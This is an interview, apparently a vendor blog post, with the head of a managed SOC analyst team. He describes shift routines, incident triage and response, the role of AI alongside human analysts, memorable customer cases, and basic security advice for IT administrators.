Christoph Schulze has been working for the German cyber defence specialist in Bochum since 2022. He heads the Managed SOC analyst team, which works 24/7 to ensure that cyber attacks are stopped immediately before they cause serious damage.
What does a typical working day look like for you and your team?
Christoph Schulze: My working day usually starts with a look at the handover and the messages from the analysts on the night shift. Since our team works around the clock, it is important to know first thing in the morning whether there are any incidents with customers or open issues. I then plan my day, work through my tasks and prepare for upcoming meetings. As a team leader, I am in frequent contact with other departments such as development and customer service. I also take on organisational functions and support my people with questions or more complex cases. At the same time, I also look at malicious actions that have occurred at customers' sites. This helps me to optimise processes and develop new ideas for our threat hunting – the proactive search for previously unknown threats in IT systems.
Our analysts' daily routine is slightly different: they also start with a shift handover before turning their attention to incoming alerts. They check whether these are harmless activities or critical incidents. They are in constant close contact with each other so that they can initiate a more in-depth analysis in case of doubt. It is important that every event is reliably assessed and documented so that our customers are protected at all times. At the end of the shift, there is another handover. This ensures that our Managed Security Operations Centre functions seamlessly and effectively around the clock.
How do cybercriminals try to gain access to IT systems? What are some typical actions you observe attackers taking?
Christoph Schulze: Cybercriminals primarily use phishing to gain initial access to a system. This is done via specially crafted email attachments that appear to contain business-related content, such as alleged salary tables. Another method involves links in emails that lead to fake websites and request access data. It is striking that many campaigns are very professionally tailored to specific companies. This makes them difficult to distinguish from legitimate communication.
Once an attacker has completed this first step, a backdoor is often installed. This can be used to download additional commands. Today, attackers use legitimate Windows on-board tools and administrator tools to operate within the network, exfiltrate data or initiate encryption processes. Because these activities appear to be normal processes at first glance, detection is difficult. It is therefore important to block phishing directly – either by raising employee awareness or by using reliable security solutions.
When does your team spring into action? How does the analysis and response process work?
Christoph Schulze: Our SOC team springs into action as soon as a customer system reports suspicious behaviour. The sensors then provide us with a wealth of information – from process chains and executed commands to affected users or files. On this basis, the analysts first check whether it is a genuine security incident or just a false alarm. If it is indeed an incident, we delve deeper into the analysis. To do this, we connect directly to the affected system, check running processes and services, and examine suspicious files. If a threat is confirmed, the actual response follows. Depending on the situation, we isolate compromised systems, move suspicious files into quarantine or remove attacker artefacts. We also restore falsely blocked files if an alarm turns out to be harmless.
At the same time, we keep the customer informed at all times and provide specific recommendations for action. These range from immediate measures to longer-term advice on how to reduce risks in the future. In this way, we not only ensure that attacks are stopped, but also that the causes are understood and vulnerabilities are closed.
How quickly do you respond to harmful incidents affecting a customer?
Christoph Schulze: It's difficult to give a general time frame because the response always depends on the type and severity of the incident. Basically, the automatic response kicks in immediately as soon as suspicious behaviour is detected. For example, the system isolates files or processes even before an analyst intervenes. At the same time, our team immediately begins its analysis. Critical alerts have the highest priority. In less serious cases, we usually inform the customer within 20 to 40 minutes with specific recommendations for action. However, if it is a serious attack, a system is isolated within a very short time and the company is contacted directly. It is important for us to strike a balance: we react quickly, but not rashly. A hasty measure that ultimately affects the customer's systems helps no one. Through a combination of automatic detection, rapid human analysis and clear prioritisation, we ensure that incidents are detected, classified and defused as quickly as possible.
When responding to an incident, how do you ensure that you have made the right decision?
Christoph Schulze: We always weigh up very carefully whether or not to intervene – for example, when it comes to central systems such as a company's domain controller. In such cases, we act with particular caution and coordination. Experience is an important factor. With each new customer, we learn typical patterns and develop a sense of what is normal behaviour and what indicates an attack. We share this knowledge within the team through documentation, joint analyses and regular workshops. We also simulate attack scenarios in test environments to practise what real incidents look like and what responses are appropriate.
In everyday life, we are helped by clearly prioritising alerts that have already been assigned a criticality rating and description by our detection and protection engineers. This allows us to quickly assess whether an incident is harmless or whether immediate action is required. We rarely make critical decisions alone, but actively consult with colleagues. This ensures that multiple perspectives are always taken into account in the assessment.
Ultimately, the goal is to minimise the damage to the customer. When in doubt, we would rather isolate a user's computer too early than allow a real attack to continue unchecked. This combination of experience, teamwork and continuous training ensures that our responses are well-founded and appropriate, even under time pressure.
What role does artificial intelligence play in your work? Could AI replace you in general?
Christoph Schulze: Artificial intelligence plays an important role for us – especially in the analysis of large amounts of data. AI-based systems can recognise patterns very quickly, identify recurring false alarms and thus relieve the analyst team. This is a great advantage, especially when there are thousands of incidents per day. It separates the wheat from the chaff and helps us to identify the really critical cases more quickly.
Nevertheless, artificial intelligence is not a substitute for human analysts, but rather a useful addition. Attacks rarely follow a set pattern, and outliers or new attack techniques in particular can only be reliably assessed through experience, contextual knowledge and flexibility. That's why humans always remain in control, checking AI assessments and ultimately making the decisions.
In everyday life, we use AI selectively as a sparring partner, for example to present information in a bundled form or to get food for thought for the analyst team – without feeding in customer data, of course. However, humans remain indispensable for the actual response, because every measure must be tailored to the individual customer and situation. In the long term, AI will primarily help us to manage the mass of data more efficiently and prevent alert fatigue (fatigue due to too many alerts). However, the responsibility for correctly classifying attacks and responding appropriately remains clearly with the analyst.
Is there a customer case that particularly sticks in your mind?
Christoph Schulze: One case that particularly sticks in my mind involves a newly discovered SharePoint security vulnerability. Attackers were able to use it to place backdoors on servers and take control. Just a few hours after the public announcement, we actually received an alert from a customer: a corresponding file had been stored. Since our team of analysts had already prepared a detection, we were able to respond immediately, move the file to quarantine and isolate the affected systems. That same night, we informed the customer by telephone and took further steps together. A forensic analysis later confirmed that no damage had been done. This is an example of how important rapid response and close cooperation are.
A second case shows the other side of the coin: On Christmas Eve, a customer scheduled a penetration test without informing us in advance. We detected the attack, isolated the system and tried unsuccessfully to contact the customer – we only received a response several days later. Although the test was harmless, it highlighted how risky it can be to be unavailable. This is particularly true when questions need to be clarified and the customer needs to help with the response. If it had been a real attack, no one would have been able to respond. For us, this was a striking example of how important not only technology but also awareness and clear processes are.
Do you often have to take action outside of business hours? How do you contact customers in these cases?
Christoph Schulze: For us, there is no such thing as ‘outside business hours’. Customer systems run around the clock, and so does our monitoring. Accordingly, we receive alerts at any time – from automated vulnerability scans and backup processes to confirmed attacks.
If an incident is critical, we first inform the customer in writing and then pick up the phone. Each company has emergency contacts on file, which we call until we reach someone. This usually works very reliably – the exception mentioned on Christmas Eve was a special case. It is important that we can implement most of the urgent measures ourselves, even if the customer is not available at short notice. Systems are isolated, malicious files are moved to quarantine, or processes are terminated. The company then receives a summary and specific recommendations for action. This ensures that an attack can be stopped at any time, whether on weekdays, at night, or on weekends.
Do you have any tips for IT administrators on what they can do to improve security in their network with simple measures?
Christoph Schulze: The most effective measure does not start with the firewall, but with people. Training and regular phishing simulations significantly reduce the most common attack vector. At the same time, IT managers should ensure that only systems that are really needed are accessible from the internet. Components that do not require external access belong behind internal networks or VPNs.
Technically, patch management is key. Critical security updates should be installed promptly because vulnerabilities that have become public are quickly exploited by attackers using automated methods. In addition, password managers and multi-factor authentication significantly increase protection against the spying of access data for services.
In operation, strict allocation of user rights pays off. This includes: admin rights only for actually authorised persons, immediately terminating sessions and processes with elevated rights when they are no longer needed, and enforcing admin sessions that are as short-lived as possible. In this way, IT managers reduce the attack surface.
Finally, backups, network segmentation and behaviour-based detection, such as our Managed Security Operations Centre, should be standard equipment. Regular tests, joint exercises and clear emergency contacts round off the package of measures and ensure that technical precautions are also used effectively in an emergency.
How often do you rely on active cooperation from customers to resolve incidents?
Christoph Schulze: In most cases, we can analyse and contain incidents independently. We rarely need active cooperation from customers. This is usually when we send recommendations for action and need feedback on whether they have been taken and implemented. This is the minimum we need to rely on to ensure that everyone involved is on the same page.
Beyond that, there are individual situations in which we need the customer's support. For example, when we need to clarify whether certain tools – such as network scanners – are being used legitimately or whether they are potential attack tools. We may also request suspicious files in order to further improve our detection systems.
There have already been two articles in the blog series ‘The minds behind Managed SOC’. Andy Felbinger kicked things off with questions and answers about sales. Tobias Misse then talked about onboarding. For the next article, I will be switching sides and talking to a partner. Stay tuned!
